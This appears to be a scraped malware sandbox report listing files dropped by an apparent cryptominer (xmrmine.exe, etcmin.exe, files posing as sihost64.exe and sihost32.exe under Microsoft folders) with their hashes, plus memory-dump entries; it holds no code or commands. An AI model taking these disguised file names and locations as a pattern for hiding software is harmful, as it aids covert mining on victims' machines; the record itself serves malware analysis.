SHA1
78235c164ebfa47d613a100abf5c64bed10c1036

SHA256
a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c

SHA512
d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32

Download Submit
C:\Users\Admin\AppData\Roaming\xmrmine.exe
MD5
973037113a1f50e0ca79d3cc42a5ef66

SHA1
78235c164ebfa47d613a100abf5c64bed10c1036

SHA256
a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c

SHA512
d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32

Download Submit
C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exe
MD5
f20a5085dbb85927b25ed46a45fe0a13

SHA1
41b351e45a7be1d6c6c6918ee65b00f5d69ff787

SHA256
370f698a696bd33c167348773c954d3b079ee719d91f7fa10c47e96bd647a235

SHA512
4cba09f695db44f05c46511f4ca5a6d2d670f83b93793cfeb09e4112986eff44787061832993aa2dc69ef967327e63a09d4675a1e3dd1433f9ad30391158bc3f

Download Submit
C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exe
MD5
e149663730c0b03c8936baffe9645bb4

SHA1
c0fb146c35d48481df4149027953e4ab7be59e95

SHA256
33225a857521c55b3456fa11dad3568911c30bc74d408eba8b3f61a2b4118469

SHA512
553078b3bb9bab56d3f4df890f798118d4a3ec0d83550c1d9ac20df02ab4a4672fc0cc8ec170de56336679a81f7a0809c1a2de5cedfcddf916ed5768f2275abe

Download Submit
C:\Users\Admin\appdata\roaming\rtksmbs.exe
MD5
406f2550d0d4b9b3e2f47994076e8b8b

SHA1
01ab414c9d14ef6a10cd1f3c815e2d63ace18822

SHA256
4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0

SHA512
73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4

Download Submit
C:\Users\Admin\appdata\roaming\serverpatch.exe
MD5
973037113a1f50e0ca79d3cc42a5ef66

SHA1
78235c164ebfa47d613a100abf5c64bed10c1036

SHA256
a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c

SHA512
d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\libs\sihost64.exe
MD5
f20a5085dbb85927b25ed46a45fe0a13

SHA1
41b351e45a7be1d6c6c6918ee65b00f5d69ff787

SHA256
370f698a696bd33c167348773c954d3b079ee719d91f7fa10c47e96bd647a235

SHA512
4cba09f695db44f05c46511f4ca5a6d2d670f83b93793cfeb09e4112986eff44787061832993aa2dc69ef967327e63a09d4675a1e3dd1433f9ad30391158bc3f

Download Submit
\Users\Admin\AppData\Roaming\Microsoft\telemetry\sihost32.exe
MD5
e149663730c0b03c8936baffe9645bb4

SHA1
c0fb146c35d48481df4149027953e4ab7be59e95

SHA256
33225a857521c55b3456fa11dad3568911c30bc74d408eba8b3f61a2b4118469

SHA512
553078b3bb9bab56d3f4df890f798118d4a3ec0d83550c1d9ac20df02ab4a4672fc0cc8ec170de56336679a81f7a0809c1a2de5cedfcddf916ed5768f2275abe

Download Submit
\Users\Admin\AppData\Roaming\etcmin.exe
MD5
406f2550d0d4b9b3e2f47994076e8b8b

SHA1
01ab414c9d14ef6a10cd1f3c815e2d63ace18822

SHA256
4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0

SHA512
73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4

Download Submit
\Users\Admin\AppData\Roaming\rtksmbs.exe
MD5
406f2550d0d4b9b3e2f47994076e8b8b

SHA1
01ab414c9d14ef6a10cd1f3c815e2d63ace18822

SHA256
4805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0

SHA512
73b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4

Download Submit
\Users\Admin\AppData\Roaming\serverpatch.exe
MD5
973037113a1f50e0ca79d3cc42a5ef66

SHA1
78235c164ebfa47d613a100abf5c64bed10c1036

SHA256
a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c

SHA512
d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32

Download Submit
\Users\Admin\AppData\Roaming\xmrmine.exe
MD5
973037113a1f50e0ca79d3cc42a5ef66

SHA1
78235c164ebfa47d613a100abf5c64bed10c1036

SHA256
a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c

SHA512
d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32

Download Submit
memory/540-114-0x0000000002080000-0x0000000002082000-memory.dmp

Filesize
8KB

Download
memory/540-103-0x0000000000000000-mapping.dmp

Download
memory/540-108-0x000000013FAE0000-0x000000013FAE1000-memory.dmp

Filesize
4KB

Download
memory/856-123-0x00000000002C0000-0x00000000002E0000-memory.dmp

Filesize
128KB

Download
memory/856-119-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/856-120-0x00000001402EB66C-mapping.dmp

Download
memory/856-125-0x00000000002E0000-0x0000000000300000-memory.dmp

Filesize
128KB

Download
memory/856-124-0x00000000002C0000-0x00000000002E0000-memory.dmp

Filesize
128KB

Download
memory/856-121-0x00000000000E0000-0x0000000000100000-memory.dmp

Filesize
128KB

Download
memory/856-122-0x0000000140000000-0x0000000140758000-memory.dmp

Filesize
7.3MB

Download
memory/920-75-0x0000000000000000-mapping.dmp

Download
memory/932-77-0x0000000000000000-mapping.dmp

Download
memory/1152-95-0x0000000000000000-mapping.dmp

Download
memory/1296-79-0x000000001C810000-0x000000001C812000-memory.dmp

Filesize
8KB

Download
memory/1296-73-0x0000000000850000-0x0000000000856000-memory.dmp

Filesize
24KB

Download
memory/1296-69-0x000000013F2F0000-0x000000013F2F1000-memory.dmp

Filesize
4KB

Download
memory/1296-65-0x0000000000000000-mapping.dmp

Download
memory/1480-78-0x0000000000000000-mapping.dmp

Download
memory/1536-111-0x00000000022B0000-0x00000000022B2000-memory.dmp

Filesize
8KB

Download
memory/1536-89-0x000000013F780000-0x000000013F781000-memory.dmp

Filesize
4KB

Download
memory/1536-84-0x0000000000000000-mapping.dmp

Download
memory/1672-60-0x0000000075971000-0x0000000075973000-memory.dmp

Filesize
8KB

Download
memory/1712-100-0x0000000000000000-mapping.dmp

Download
memory/1712-107-0x000000013F250000-0x000000013F251000-memory.dmp

Filesize
4KB

Download
memory/1712-113-0x000000001BDA0000-0x000000001BDA2000-memory.dmp

Filesize
8KB

Download
memory/1756-98-0x0000000000000000-mapping.dmp

Download
memory/1812-80-0x00000000008B0000-0x00000000008B2000-memory.dmp

Filesize
8KB

Download
memory/1812-62-0x0000000000000000-mapping.dmp

Download
memory/1812-70-0x000000013FA00000-0x000000013FA01000-memory.dmp

Filesize
4KB

Download
memory/1812-74-0x0000000000860000-0x0000000000869000-memory.dmp

Filesize
36KB

Download
memory/1864-97-0x0000000000000000-mapping.dmp

Download
memory/1876-83-0x0000000000000000-mapping.dmp

Download
memory/1876-90-0x000000013F780000-0x000000013F781000-memory.dmp

Filesize
4KB

Download
memory/1876-112-0x000000001CA50000-0x000000001CA52000-memory.dmp

Filesize
8KB

Download
memory/1888-76-0x0000000000000000-mapping.dmp

Download
memory/1980-96-0x0000000000000000-mapping.dmp

Download